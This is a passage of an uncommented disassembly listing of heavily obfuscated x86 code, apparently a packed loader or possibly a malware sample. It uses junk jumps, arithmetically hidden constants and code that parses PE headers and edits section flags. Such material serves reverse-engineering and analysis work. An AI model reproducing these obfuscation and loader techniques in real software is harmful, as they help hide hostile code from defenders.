xor ebx, 0F1E48B6Eh
cmp ebx, 9AF9C0F0h
jmp loc_4239F7
; END OF FUNCTION CHUNK FOR sub_423172
; =============== S U B R O U T I N E =======================================
sub_425CA9 proc near ; DATA XREF: sub_4295A2+41F1�o
; FUNCTION CHUNK AT 00427F4F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042F508 SIZE 0000000F BYTES
add eax, edi
pop edi
xor ebx, eax
mov [ebp-8], ebx
mov eax, offset dword_42BC4C
jmp loc_42F508
sub_425CA9 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_425CBB: ; CODE XREF: _7hdaygc1:0042BEB2�j
jz loc_4241D8
jmp loc_42C6D1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A2EF
loc_425CC6: ; CODE XREF: sub_42A2EF:loc_42D707�j
lea eax, [ebp-14h]
push 0C67B87E3h
xchg eax, [esp+4+var_4]
mov ecx, eax
pop eax
or ecx, 0CB959F0Dh
add ecx, 866C179h
add ecx, ebp
jmp loc_4252A9
; END OF FUNCTION CHUNK FOR sub_42A2EF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E29B
loc_425CE7: ; CODE XREF: sub_42E29B+11�j
xchg edi, [esp+4+var_4]
mov ebp, edi
pop edi
mov eax, ds:dword_42B9AC
jmp loc_423C4F
; END OF FUNCTION CHUNK FOR sub_42E29B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E695
loc_425CF8: ; CODE XREF: sub_42E695:loc_42EA34�j
or edi, 4CF8EA49h
rol edi, 7
xor edi, 34EBAD5Dh
test edi, 2000000h
jmp loc_425A2A
; END OF FUNCTION CHUNK FOR sub_42E695
; ---------------------------------------------------------------------------
push eax
ror eax, 16h
; START OF FUNCTION CHUNK FOR sub_42C50D
loc_425D16: ; CODE XREF: sub_42C50D-87C0�j
call sub_42A473
; END OF FUNCTION CHUNK FOR sub_42C50D
; START OF FUNCTION CHUNK FOR sub_4288FE
loc_425D1B: ; CODE XREF: sub_4288FE-3080�j
jz loc_42FA62
jmp loc_42C204
; END OF FUNCTION CHUNK FOR sub_4288FE
; ---------------------------------------------------------------------------
loc_425D26: ; CODE XREF: _7hdaygc1:0042B5F2�j
push 565A5FA5h
xchg ebx, [esp]
mov eax, ebx
pop ebx
rol eax, 7
or eax, 59890A2Dh
jmp loc_428D85
; =============== S U B R O U T I N E =======================================
sub_425D3F proc near ; CODE XREF: sub_42A052:loc_42A47E�p
; _7hdaygc1:0042A684�j
xchg eax, [esp+0]
pop eax
rol eax, 16h
call sub_42D031
loc_425D4B: ; CODE XREF: sub_424A2B+7131�j
jmp nullsub_8
sub_425D3F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D287
loc_425D50: ; CODE XREF: sub_42D287+6�j
push offset sub_42CCFE
jmp nullsub_56
; END OF FUNCTION CHUNK FOR sub_42D287
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F152
loc_425D5A: ; CODE XREF: sub_42F152+A03�j
jl loc_42F192
jmp loc_4292E5
; END OF FUNCTION CHUNK FOR sub_42F152
; =============== S U B R O U T I N E =======================================
sub_425D65 proc near ; CODE XREF: _7hdaygc1:00429E48�j
; sub_42B01E+7�p
; FUNCTION CHUNK AT 004271D2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004282F3 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042C477 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D8BB SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042E802 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042EB84 SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
mov ebp, esp
add esp, 0FFFFFFF8h
mov [ebp-1], al
cmp byte ptr [ebp-1], 0
jmp loc_42EB84
sub_425D65 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426130
loc_425D7A: ; CODE XREF: sub_426130+26C0�j
jz loc_42C933
jmp loc_42B7D8
; END OF FUNCTION CHUNK FOR sub_426130
; =============== S U B R O U T I N E =======================================
sub_425D85 proc near ; CODE XREF: _7hdaygc1:00424D5A�j
; sub_42926C+1D41�p
arg_0 = dword ptr 4
arg_8 = dword ptr 0Ch
; FUNCTION CHUNK AT 0042BEC1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E7B3 SIZE 00000004 BYTES
xchg edi, [esp+0]
pop edi
xchg ebp, [esp-4+arg_0]
loc_425D8C: ; CODE XREF: _7hdaygc1:loc_42D9F2�j
mov ecx, ebp
pop ebp
pop ecx
xchg ebx, [esp-0Ch+arg_8]
jmp loc_42BEC1
sub_425D85 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F65A
loc_425D98: ; CODE XREF: sub_42F65A+E�j
mov eax, [ebp-4]
movzx eax, word ptr [eax+6]
mov [ebp-34h], eax
mov eax, [ebp-4]
movzx eax, word ptr [eax+14h]
sub eax, 0E0h
mov [ebp-30h], eax
jmp loc_42C3B9
; END OF FUNCTION CHUNK FOR sub_42F65A
; ---------------------------------------------------------------------------
jge loc_42A0ED
jmp sub_42BEC6
; ---------------------------------------------------------------------------
loc_425DC1: ; CODE XREF: _7hdaygc1:004250AE�j
add edx, 1EAB37D9h
mov [edx], eax
pop edx
cmp dword ptr [ebp-30h], 0
jle loc_426C06
jmp loc_4287F5
; ---------------------------------------------------------------------------
loc_425DD9: ; DATA XREF: sub_427CC6+6125�o
jz loc_42ADA7
cmp eax, 0FFFFFFFFh
jz loc_42ADA7
mov eax, [eax]
jmp loc_42787E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427CC6
loc_425DEF: ; CODE XREF: sub_427CC6:loc_42DDE3�j
or eax, eax
call sub_426B1A
; END OF FUNCTION CHUNK FOR sub_427CC6
; START OF FUNCTION CHUNK FOR sub_425735
loc_425DF6: ; CODE XREF: sub_425735+41CF�j
push offset loc_42E397
jmp loc_42FB17
; END OF FUNCTION CHUNK FOR sub_425735
; ---------------------------------------------------------------------------
locret_425E00: ; CODE XREF: _7hdaygc1:0042BF8C�j
retn
; ---------------------------------------------------------------------------
loc_425E01: ; DATA XREF: _7hdaygc1:loc_425A7B�o
add eax, [edx+10h]
push edi
mov edi, edx
xchg edi, [esp]
push 32473C1Fh
pop edx
xor edx, 400BAA91h
or edx, 4A802CCDh
jmp loc_429E7D
; =============== S U B R O U T I N E =======================================
sub_425E21 proc near ; CODE XREF: _7hdaygc1:00425F4E�j
; sub_423D6F+B93C�p
; FUNCTION CHUNK AT 00423F5E SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0042F1C0 SIZE 00000006 BYTES
xchg edx, [esp+0]
pop edx
push 6767CD7Eh
pop esi
jmp loc_423F5E
sub_425E21 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F152
loc_425E30: ; CODE XREF: sub_42F152-25D2�j
cdq
jmp loc_42F192
; END OF FUNCTION CHUNK FOR sub_42F152
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA47
loc_425E36: ; CODE XREF: sub_42AA47:loc_42AF2B�j
push 97A5D199h
pop eax
xor eax, 0FA7B4517h
sub eax, 0D1E7E78Ch
xor eax, 215E5A20h
call sub_42AB0F
loc_425E53: ; CODE XREF: sub_4255F3+8�j
jz loc_4249A1
jmp loc_42684D
; END OF FUNCTION CHUNK FOR sub_42AA47
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_27. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FD11
loc_425E5F: ; CODE XREF: sub_42FD11-770E�j
jmp loc_4235D4
; END OF FUNCTION CHUNK FOR sub_42FD11
; =============== S U B R O U T I N E =======================================
sub_425E64 proc near ; CODE XREF: _7hdaygc1:0042B847�j
; sub_4237DA:loc_42EEBE�p
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00424650 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00424B82 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00424F72 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00424F99 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00426BCB SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00426ECD SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00427290 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00427879 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427CA4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428ABC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042933A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429471 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0042A54F SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042A7D4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042B667 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042B69D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042BABB SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042BF51 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C7A5 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042D35C SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042D519 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042D72D SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042DAA4 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042DB23 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042DC08 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042EB02 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042F18C SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042F277 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042F903 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042FB44 SIZE 0000000B BYTES
xchg edi, [esp+0]
pop edi
xor eax, 297C3B0h
add eax, ebp
add eax, 0E26F826Ah
mov eax, [eax]
cmp word ptr [eax], 5A4Dh
jmp loc_42B69D
sub_425E64 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4289CE
loc_425E82: ; CODE XREF: sub_4289CE:loc_42F70A�j
add eax, ebp
add eax, 61136251h
mov eax, [eax]
push eax
push 28h
push 0E0E6EFC0h
jmp loc_42B94D
; END OF FUNCTION CHUNK FOR sub_4289CE
; ---------------------------------------------------------------------------
push eax
call sub_42D9E1
lea eax, sub_428F69
push ecx
push 0BAFD543Ah
jmp loc_42C324
; ---------------------------------------------------------------------------
adc esi, ecx
jmp loc_42B528
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4240B0
loc_425EB7: ; CODE XREF: sub_4240B0:loc_424D9C�j
call sub_42AA07
lea eax, [ebp-14h]
loc_425EBF: ; CODE XREF: sub_42450E:loc_4284BB�j
push eax
call sub_429B49
; END OF FUNCTION CHUNK FOR sub_4240B0
; START OF FUNCTION CHUNK FOR sub_42409E
loc_425EC5: ; CODE XREF: sub_42409E:loc_4245B2�j
mov ds:dword_427CA0, eax
jmp loc_42F99B
; END OF FUNCTION CHUNK FOR sub_42409E
; ---------------------------------------------------------------------------
loc_425ECF: ; CODE XREF: _7hdaygc1:loc_42883A�j
push ebx
push 98131766h
pop ebx
and ebx, 0C1CE0DB2h
add ebx, 804085A5h
loc_425EE2: ; CODE XREF: _7hdaygc1:00424B52�j
xchg ebx, [esp]
jmp loc_428AC8
; ---------------------------------------------------------------------------
loc_425EEA: ; DATA XREF: sub_4232C2:loc_42B9FB�o
cmp edi, 80000001h
jbe loc_42E845
jmp loc_42817E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F436
loc_425EFB: ; CODE XREF: sub_42F436:loc_42B9A4�j
add eax, [esp+0]
adc edx, [esp+arg_0]
add esp, 8
movzx eax, word ptr [eax]
shl eax, 2
jmp loc_428277
; END OF FUNCTION CHUNK FOR sub_42F436
; ---------------------------------------------------------------------------
loc_425F10: ; CODE XREF: _7hdaygc1:loc_42817E�j
ja loc_42CCA9
jmp loc_42E3FB
; ---------------------------------------------------------------------------
loc_425F1B: ; CODE XREF: _7hdaygc1:004237B8�j
jg loc_428337
ja loc_42C520
; =============== S U B R O U T I N E =======================================
sub_425F27 proc near ; CODE XREF: sub_42E94F-5B22�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042301E SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00423168 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042353D SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00423907 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004254CC SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004255ED SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042568C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042699B SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00428E17 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004299EF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429C2F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00429ED5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042A3D5 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0042B44A SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042CD8F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042DC3B SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042E4CA SIZE 00000003 BYTES
; FUNCTION CHUNK AT 0042E5A9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042EA39 SIZE 0000000B BYTES
xchg eax, [esp+0]
pop eax
jmp loc_42301E
sub_425F27 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424FE5
loc_425F30: ; CODE XREF: sub_424FE5:loc_4238C0�j
push offset sub_42C177
jmp nullsub_171
; END OF FUNCTION CHUNK FOR sub_424FE5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423172
loc_425F3A: ; CODE XREF: sub_423172+9E63�j
cdq
idiv ecx
add edx, 30h
mov eax, [ebp-10h]
mov [ebp+eax-20h], dl
jmp loc_42DA57
; END OF FUNCTION CHUNK FOR sub_423172
; ---------------------------------------------------------------------------
or esi, ebx
jmp sub_425E21
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429EBB
loc_425F53: ; CODE XREF: sub_429EBB+B�j
or eax, 2783C479h
and eax, 2BEEF8D4h
sub eax, 89061ADDh
add eax, 5E374190h
and ebx, eax
pop eax
jmp loc_426711
; END OF FUNCTION CHUNK FOR sub_429EBB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F075
loc_425F73: ; CODE XREF: sub_42F075+9�j
mov esi, ecx
pop ecx
call sub_428C3B
push ecx
call sub_42B4DE
loc_425F81: ; CODE XREF: sub_42E347-1F19�j
jmp loc_4234F1
; END OF FUNCTION CHUNK FOR sub_42F075
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_73. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F8F6
loc_425F87: ; CODE XREF: sub_42F8F6+8�j
jmp loc_42F220
; END OF FUNCTION CHUNK FOR sub_42F8F6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E94F
loc_425F8C: ; CODE XREF: sub_42E94F-7BC4�j
jmp loc_428E2B
; END OF FUNCTION CHUNK FOR sub_42E94F
; ---------------------------------------------------------------------------
loc_425F91: ; CODE XREF: _7hdaygc1:004263A5�j
jmp sub_428C3B
; ---------------------------------------------------------------------------
loc_425F96: ; DATA XREF: sub_428917+5�o
push 6FEB5CC0h
pop eax
or eax, 2A912DB1h
test eax, 20000h
jmp loc_42921A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424AE1
loc_425FAD: ; CODE XREF: sub_424AE1+8641�j
adc ebp, ecx
jmp loc_428DCA
; END OF FUNCTION CHUNK FOR sub_424AE1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423172
loc_425FB4: ; CODE XREF: sub_423172+8CAA�j
idiv ecx
mov [ebp-8], eax
inc dword ptr [ebp-10h]
cmp dword ptr [ebp-8], 0
jnz loc_424E4D
jmp loc_42965F
; END OF FUNCTION CHUNK FOR sub_423172
; =============== S U B R O U T I N E =======================================
sub_425FCB proc near ; CODE XREF: sub_428B5B-1D0A�p
; _7hdaygc1:0042CC97�j
xchg ecx, [esp+0]
pop ecx
inc dword ptr [ebp-0Ch]
push offset loc_4247B5
jmp loc_423EAE
sub_425FCB endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BAD5
loc_425FDC: ; CODE XREF: sub_42BAD5:loc_425289�j
lea eax, [edx+eax]
mov [ebp-44h], eax
push offset loc_429F96
jmp loc_4258BE
; END OF FUNCTION CHUNK FOR sub_42BAD5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4263AB
loc_425FEC: ; CODE XREF: sub_4263AB:loc_42908E�j
xchg ecx, [esp+0]
mov ebp, esp
add esp, 0FFFFFFF8h
push offset sub_426581
jmp nullsub_201
; END OF FUNCTION CHUNK FOR sub_4263AB
; ---------------------------------------------------------------------------
push offset sub_42F0D1
jmp locret_42F30B
; =============== S U B R O U T I N E =======================================
sub_426008 proc near ; CODE XREF: _7hdaygc1:004299EA�p
; _7hdaygc1:0042DC99�j
; FUNCTION CHUNK AT 0042BEBC SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
mov [ecx], eax
pop ecx
jmp loc_42BEBC
sub_426008 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425752
loc_426014: ; CODE XREF: sub_425752:loc_42A04D�j
sub edx, 8AAB9651h
xor edx, 4629C398h
and edx, 76F678E6h
xor edx, 46145824h
jmp loc_42924F
; END OF FUNCTION CHUNK FOR sub_425752
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425A37
loc_426031: ; CODE XREF: sub_425A37:loc_428576�j
add eax, ebp
push ebx
push 24D51F4Fh
pop ebx
loc_42603A: ; CODE XREF: _7hdaygc1:loc_42E68F�j
xor ebx, 0A8DFE6ACh
test ebx, 2000h
jmp loc_428B4A
; END OF FUNCTION CHUNK FOR sub_425A37
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C7F3
loc_42604B: ; CODE XREF: sub_42C7F3-5B86�j
and eax, 27D43B5Bh
xor eax, 0C2FB88D1h
add eax, ebp
push ecx
push 0AAA472B4h
jmp loc_42CE1B
; END OF FUNCTION CHUNK FOR sub_42C7F3
; =============== S U B R O U T I N E =======================================
sub_426064 proc near ; CODE XREF: _7hdaygc1:00428164�j
; _7hdaygc1:loc_42FBD1�p
; FUNCTION CHUNK AT 00423F7F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423FCA SIZE 0000000D BYTES
xchg edx, [esp+0]
pop edx
xor eax, 86E0CE91h
add eax, ebp
add eax, 0F80F1B39h
jmp loc_423F7F
sub_426064 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
sub ebx, 62E05C11h
jmp loc_42BB6F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424AA8
loc_426086: ; CODE XREF: sub_424AA8+9�j
xchg edi, [esp+4+var_4]
mov eax, edi
pop edi
add eax, 0DD727A06h
cmp eax, 38B4E51Ah
jmp loc_427C8D
; END OF FUNCTION CHUNK FOR sub_424AA8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A833
loc_42609D: ; CODE XREF: sub_42A833+210B�j
mov esi, 0DFF83E73h
jmp loc_423000
; END OF FUNCTION CHUNK FOR sub_42A833
; ---------------------------------------------------------------------------
xchg edx, [ebx]
cmp edi, 28201301h
jmp loc_427D34
; =============== S U B R O U T I N E =======================================
sub_4260B4 proc near ; CODE XREF: _7hdaygc1:00426557�j
; sub_42D245-371A�p
; FUNCTION CHUNK AT 00426DBE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042DC9E SIZE 00000015 BYTES
xchg edx, [esp+0]
pop edx
shr eax, 0Bh
xor [ebp-8], eax
mov eax, [ebp-8]
jmp loc_426DBE
sub_4260B4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4260C6: ; CODE XREF: _7hdaygc1:0042D5D6�j
not ecx
loc_4260C8: ; CODE XREF: _7hdaygc1:loc_425279�j
xor eax, 0EEDF3328h
add eax, ebp
add eax, 0BFBFB475h
mov eax, [eax]
and dword ptr [eax+24h], 7FFFFFFFh
jmp loc_42AA2A
; ---------------------------------------------------------------------------
loc_4260E4: ; CODE XREF: _7hdaygc1:loc_42E190�j
jg loc_427257
jmp loc_424CB1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_136. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291EA
loc_4260F0: ; CODE XREF: sub_4291EA:loc_42F974�j
jl loc_4272A3
pop eax
sbb esi, ecx
cmp edi, 910CC87Eh
jmp loc_428D8A
; END OF FUNCTION CHUNK FOR sub_4291EA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42450E
loc_426104: ; CODE XREF: sub_42450E+8DA6�j
ja loc_4250C0
jmp loc_4284BB
; END OF FUNCTION CHUNK FOR sub_42450E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4268D9
loc_42610F: ; CODE XREF: sub_4268D9-280A�j
jl loc_42FD7C
jz loc_42F6D3
loc_42611B: ; CODE XREF: sub_4268D9:loc_42F66D�j
add edi, 0E0269879h
xchg edi, [esp+0]
push esi
jmp loc_428DE1
; END OF FUNCTION CHUNK FOR sub_4268D9
; ---------------------------------------------------------------------------
loc_42612A: ; CODE XREF: _7hdaygc1:0042AEBD�j
sbb eax, 0FC3F5AAFh
; =============== S U B R O U T I N E =======================================
sub_426130 proc near ; CODE XREF: sub_42C26B:loc_426BE7�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042343F SIZE 00000025 BYTES
; FUNCTION CHUNK AT 004235C0 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004240DC SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00424F89 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00425083 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00425712 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00425D7A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004261BC SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004286D9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004287E4 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004288F4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042978D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A427 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042B7D8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042BF37 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042BF56 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C46C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042C933 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D0CA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D37F SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042D39C SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042D8E4 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042DF67 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0042DF98 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0042F147 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042F171 SIZE 0000001B BYTES
xchg edx, [esp+4+var_4]
pop edx
mov ebx, [edx+eax*4]
call sub_428C3B
loc_42613C: ; CODE XREF: sub_42C26B-6092�j
push edi
push 0AA53EA41h
pop edi
jmp loc_42343F
sub_426130 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_426148: ; CODE XREF: _7hdaygc1:0042391A�j
sub ebp, 0D1F1F44Ch
; =============== S U B R O U T I N E =======================================
sub_42614E proc near ; CODE XREF: sub_42C16F:loc_42D6F0�p
xchg ecx, [esp+0]
pop ecx
rol eax, 17h
push eax
retn
sub_42614E endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C16F
loc_426157: ; CODE XREF: sub_42C16F:loc_42C650�j
jmp loc_42A2C9
; END OF FUNCTION CHUNK FOR sub_42C16F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BD51
loc_42615C: ; CODE XREF: sub_42BD51+C�j
jmp loc_427CF4
; END OF FUNCTION CHUNK FOR sub_42BD51
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A833
loc_426161: ; CODE XREF: sub_42A833-F6E�j
jmp loc_42E9B2
; END OF FUNCTION CHUNK FOR sub_42A833
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F152
loc_426166: ; CODE XREF: sub_42F152-5F6D�j
jmp loc_42FB4F
; END OF FUNCTION CHUNK FOR sub_42F152
; =============== S U B R O U T I N E =======================================
sub_42616B proc near ; CODE XREF: sub_42821A+4�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00424053 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004255E1 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00426658 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004280E8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428DF2 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0042A41C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042C4ED SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042C84B SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042E599 SIZE 00000005 BYTES
push esi
mov esi, ebp
jmp loc_428DF2
sub_42616B endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_159. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4269CB
loc_426174: ; CODE XREF: sub_4269CB+65C2�j
js loc_42F8A5
loc_42617A: ; CODE XREF: sub_4269CB:loc_42521E�j
call sub_42DAE8
and ebx, 0C329AD5h
jmp loc_42A691
; END OF FUNCTION CHUNK FOR sub_4269CB
; ---------------------------------------------------------------------------
loc_42618A: ; CODE XREF: _7hdaygc1:00429F91�j
popf
; START OF FUNCTION CHUNK FOR sub_424F62
loc_42618B: ; CODE XREF: sub_424F62:loc_42AEC3�j
xor esi, 613E6D5Eh
call sub_42EBD6
; END OF FUNCTION CHUNK FOR sub_424F62
; START OF FUNCTION CHUNK FOR sub_424680
loc_426196: ; CODE XREF: sub_424680+11�j
or eax, edx
mov edx, [ebp+8]
mov [edx-8], eax
loc_42619E: ; CODE XREF: sub_42581B-FF6�j
; sub_42C443:loc_424EDA�j ...
mov eax, [ebp-4]
mov [ebp-8], eax
jmp loc_42C889
; END OF FUNCTION CHUNK FOR sub_424680
; ---------------------------------------------------------------------------
loc_4261A9: ; CODE XREF: _7hdaygc1:00427028�j
push ebp
pop esi
mov esi, [esi]
sub esi, eax
mov [ebp+0], esi
push offset sub_428DE6
jmp locret_42CD84
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426130
loc_4261BC: ; CODE XREF: sub_426130:loc_42BF56�j
not ebp
xor eax, 0B438443Dh
jmp loc_425083
; END OF FUNCTION CHUNK FOR sub_426130
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C26B
loc_4261C9: ; CODE XREF: sub_42C26B:loc_423393�j
xor edx, edx
mov edx, ds:dword_42BC60
mov ebx, [edx+eax*4]
call sub_428C3B
jmp loc_42613C
; END OF FUNCTION CHUNK FOR sub_42C26B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253A0
loc_4261DE: ; CODE XREF: sub_4253A0:loc_428F43�j
cmp eax, [ebp-8]
jnz loc_4237C9
mov eax, [ebp-14h]
push offset loc_42D719
jmp nullsub_54
; END OF FUNCTION CHUNK FOR sub_4253A0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA9B
loc_4261F4: ; CODE XREF: sub_42AA9B:loc_4271C8�j
rol eax, 0Fh
add eax, 26A7D8EFh
popf
xchg eax, [esp+10h+var_10]
jmp sub_42A94C
; END OF FUNCTION CHUNK FOR sub_42AA9B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425C3B
loc_426206: ; CODE XREF: sub_425C3B+3FDF�j
and edx, 24157BB9h
loc_42620C: ; CODE XREF: sub_42EA6A:loc_42E502�j
call sub_429E9F
loc_426211: ; CODE XREF: _7hdaygc1:0042AAED�j
jnp loc_424D5F
cmp ebx, edi
jmp loc_423488
; END OF FUNCTION CHUNK FOR sub_425C3B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA07
loc_42621E: ; CODE XREF: sub_42AA07:loc_427E27�j
or edx, 0E981FEE0h
xor edx, 344A76EFh
and edx, 40D8BDD3h
xor edx, 3B98D365h
